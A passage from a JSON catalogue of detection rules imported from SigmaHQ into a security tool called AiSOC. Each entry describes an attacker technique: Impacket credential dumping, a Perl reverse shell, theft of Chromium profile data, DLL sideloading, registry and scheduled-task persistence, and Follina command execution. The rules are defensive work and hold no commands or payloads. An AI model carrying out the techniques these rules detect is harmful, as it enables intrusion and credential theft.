Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jamf-mdm-potential-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2316929c-01aa-438c-970f-099145ab1ee6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml" } }, { "id": "sigmahq-sigma-234dc5df-40b5-49d1-bf53-0d44ce778eca", "type": "detection", "name": "Payload Decoded and Decrypted via Built-in Utilities", "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. 
This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1204", "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/payload-decoded-and-decrypted-via-built-in-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "234dc5df-40b5-49d1-bf53-0d44ce778eca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" } }, { "id": "sigmahq-sigma-234f9f48-904b-4736-a34c-55d23919e4b7", "type": "detection", "name": "Google Cloud Re-identifies Sensitive Information", "description": "Identifies when sensitive information is re-identified in google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1565" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-re-identifies-sensitive-information.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "234f9f48-904b-4736-a34c-55d23919e4b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml" } 
}, { "id": "sigmahq-sigma-23590215-4702-4a70-8805-8dc9e58314a2", "type": "detection", "name": "Registry-Free Process Scope COR_PROFILER", "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-free-process-scope-cor-profiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "23590215-4702-4a70-8805-8dc9e58314a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" } }, { "id": "sigmahq-sigma-236d8e89-ed95-4789-a982-36f4643738ba", "type": "detection", "name": "Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script", "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-persistence-via-vmwaretoolboxcmd-exe-vm-state-change-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "236d8e89-ed95-4789-a982-36f4643738ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml" } }, { "id": "sigmahq-sigma-238527ad-3c2c-4e4f-a1f6-92fd63adb864", "type": "detection", "name": "Antivirus Exploitation Framework Detection", "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1203", "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/antivirus-exploitation-framework-detection.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_exploiting.yml" } }, { "id": "sigmahq-sigma-23b71bc5-953e-4971-be4c-c896cda73fc2", "type": "detection", "name": "Sysmon Blocked Executable", "description": "Triggers on any Sysmon \"FileBlockExecutable\" event, 
which indicates a violation of the configured block policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-blocked-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "23b71bc5-953e-4971-be4c-c896cda73fc2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_file_block_executable.yml" } }, { "id": "sigmahq-sigma-23c43900-e732-45a4-8354-63e4a6c187ce", "type": "detection", "name": "MacOS Emond Launch Daemon", "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.014" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macos-emond-launch-daemon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "23c43900-e732-45a4-8354-63e4a6c187ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" } }, { "id": "sigmahq-sigma-23ceaf5c-b6f1-4a32-8559-f2ff734be516", "type": "detection", "name": "Dumping Process via 
Sqldumper.exe", "description": "Detects process dump via legitimate sqldumper.exe binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dumping-process-via-sqldumper-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" } }, { "id": "sigmahq-sigma-241e802a-b65e-484f-88cd-c2dc10f9206d", "type": "detection", "name": "Read Contents From Stdin Via Cmd.EXE", "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/read-contents-from-stdin-via-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "241e802a-b65e-484f-88cd-c2dc10f9206d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml" } }, { "id": 
"sigmahq-sigma-242301bc-f92f-4476-8718-78004a6efd9f", "type": "detection", "name": "DLL Loaded via CertOC.EXE", "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-loaded-via-certoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "242301bc-f92f-4476-8718-78004a6efd9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml" } }, { "id": "sigmahq-sigma-243380fa-11eb-4141-af92-e14925e77c1b", "type": "detection", "name": "Potential PSFactoryBuffer COM Hijacking", "description": "Detects changes to the PSFactory COM InProcServer32 registry. 
This technique was used by RomCom to create persistence by storing a malicious DLL.
"sigmahq-sigma-24357373-078f-44ed-9ac4-6d334a668a11", "type": "detection", "name": "Direct Autorun Keys Modification", "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/direct-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24357373-078f-44ed-9ac4-6d334a668a11", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml" } }, { "id": "sigmahq-sigma-243de76f-4725-4f2e-8225-a8a69b15ad61", "type": "detection", "name": "PowerShell Create Local User", "description": "Detects creation of a local user via PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-create-local-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "243de76f-4725-4f2e-8225-a8a69b15ad61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" } }, { "id": "sigmahq-sigma-24549159-ac1b-479c-8175-d42aea947cae", "type": "detection", "name": "Hacktool Ruler", "description": "This events that are generated when using the hacktool Ruler by Sensepost", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087", "T1114", "T1059", "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-ruler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24549159-ac1b-479c-8175-d42aea947cae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_alert_ruler.yml" } }, { "id": "sigmahq-sigma-248649b7-d64f-46f0-9fb2-a52774166fb5", "type": "detection", "name": "Application Using Device Code Authentication Flow", "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-using-device-code-authentication-flow.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "248649b7-d64f-46f0-9fb2-a52774166fb5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml" } }, { "id": "sigmahq-sigma-24b6cf51-6122-469e-861a-22974e9c1e5b", "type": "detection", "name": "Potential SmadHook.DLL Sideloading", "description": "Detects potential DLL sideloading of \"SmadHook.dll\", a DLL used by SmadAV antivirus", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-smadhook-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24b6cf51-6122-469e-861a-22974e9c1e5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_smadhook.yml" } }, { "id": "sigmahq-sigma-24c77512-782b-448a-8950-eddb0785fc71", "type": "detection", "name": "SQLite Chromium Profile Data DB Access", "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1539", "T1555.003", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/sqlite-chromium-profile-data-db-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24c77512-782b-448a-8950-eddb0785fc71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml" } }, { "id": "sigmahq-sigma-24c8392b-aa3c-46b7-a545-43f71657fe98", "type": "detection", "name": "Suspicious Schtasks Schedule Types", "description": "Detects scheduled task creations or modification on a suspicious schedule type", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-schtasks-schedule-types.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml" } }, { "id": "sigmahq-sigma-24de4f3b-804c-4165-b442-5a06a2302c7e", "type": "detection", "name": "Arbitrary Shell Command Execution Via Settingcontent-Ms", "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. 
These files are simply XML and contain paths to various Windows 10 settings binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-shell-command-execution-via-settingcontent-ms.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24de4f3b-804c-4165-b442-5a06a2302c7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" } }, { "id": "sigmahq-sigma-24e3e58a-646b-4b50-adef-02ef935b9fc8", "type": "detection", "name": "Hacktool Execution - Imphash", "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1588.002", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-execution-imphash.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml" } }, { "id": "sigmahq-sigma-252902e3-5830-4cf6-bf21-c22083dfd5cf", "type": "detection", "name": "Possible Impacket SecretDump Remote Activity", "description": "Detect AD credential dumping using impacket secretdump HKTL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.004", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-impacket-secretdump-remote-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_impacket_secretdump.yml" } }, { "id": "sigmahq-sigma-25676e10-2121-446e-80a4-71ff8506af47", "type": "detection", "name": "Exchange PowerShell Snap-Ins Usage", "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. 
As seen used by HAFNIUM and APT27", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exchange-powershell-snap-ins-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25676e10-2121-446e-80a4-71ff8506af47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" } }, { "id": "sigmahq-sigma-2569ed8c-1147-498a-9b8c-2ad3656b10ed", "type": "detection", "name": "Potential Renamed Rundll32 Execution", "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-renamed-rundll32-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" } }, { "id": "sigmahq-sigma-258b6593-215d-4a26-a141-c8e31c1299a6", "type": "detection", "name": "Anomalous User Activity", "description": "Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/anomalous-user-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "258b6593-215d-4a26-a141-c8e31c1299a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml" } }, { "id": 
"sigmahq-sigma-258fc8ce-8352-443a-9120-8a11e4857fa5", "type": "detection", "name": "Potential Arbitrary Command Execution Using Msdt.EXE", "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-command-execution-using-msdt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml" } }, { "id": "sigmahq-sigma-259a9cdf-c4dd-4fa2-b243-2269e5ab18a2", "type": "detection", "name": "External Remote RDP Logon from Public IP", "description": "Detects successful logon from public IP address via RDP. 
This can indicate a publicly-exposed RDP port.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1078", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/external-remote-rdp-logon-from-public-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "259a9cdf-c4dd-4fa2-b243-2269e5ab18a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml" } }, { "id": "sigmahq-sigma-259dda31-b7a3-444f-b7d8-17f96e8a7d0d", "type": "detection", "name": "Potential RjvPlatform.DLL Sideloading From Default Location", "description": "Detects loading of \"RjvPlatform.dll\" by the \"SystemResetPlatform.exe\" binary which can be abused as a method of DLL side loading since the \"$SysReset\" directory isn't created by default.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rjvplatform-dll-sideloading-from-default-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "259dda31-b7a3-444f-b7d8-17f96e8a7d0d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_rjvplatform_default_location.yml" } }, { "id": "sigmahq-sigma-259df6bc-003f-4306-9f54-4ff1a08fa38e", "type": "detection", "name": "Potential Perl Reverse Shell Execution", "description": "Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-perl-reverse-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "259df6bc-003f-4306-9f54-4ff1a08fa38e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml" } }, { "id": "sigmahq-sigma-259e5a6a-b8d2-4c38-86e2-26c5e651361d", "type": "detection", "name": "PsExec Service File Creation", "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-service-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"259e5a6a-b8d2-4c38-86e2-26c5e651361d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml" } }, { "id": "sigmahq-sigma-25b9c01c-350d-4b95-bed1-836d04a4f324", "type": "detection", "name": "Moriya Rootkit - System", "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/moriya-rootkit-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "25b9c01c-350d-4b95-bed1-836d04a4f324", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_moriya_rootkit.yml" } }, { "id": "sigmahq-sigma-25cb1ba1-8a19-4a23-a198-d252664c8cef", "type": "detection", "name": "AWS EFS Fileshare Modified or Deleted", "description": "Detects when an EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": 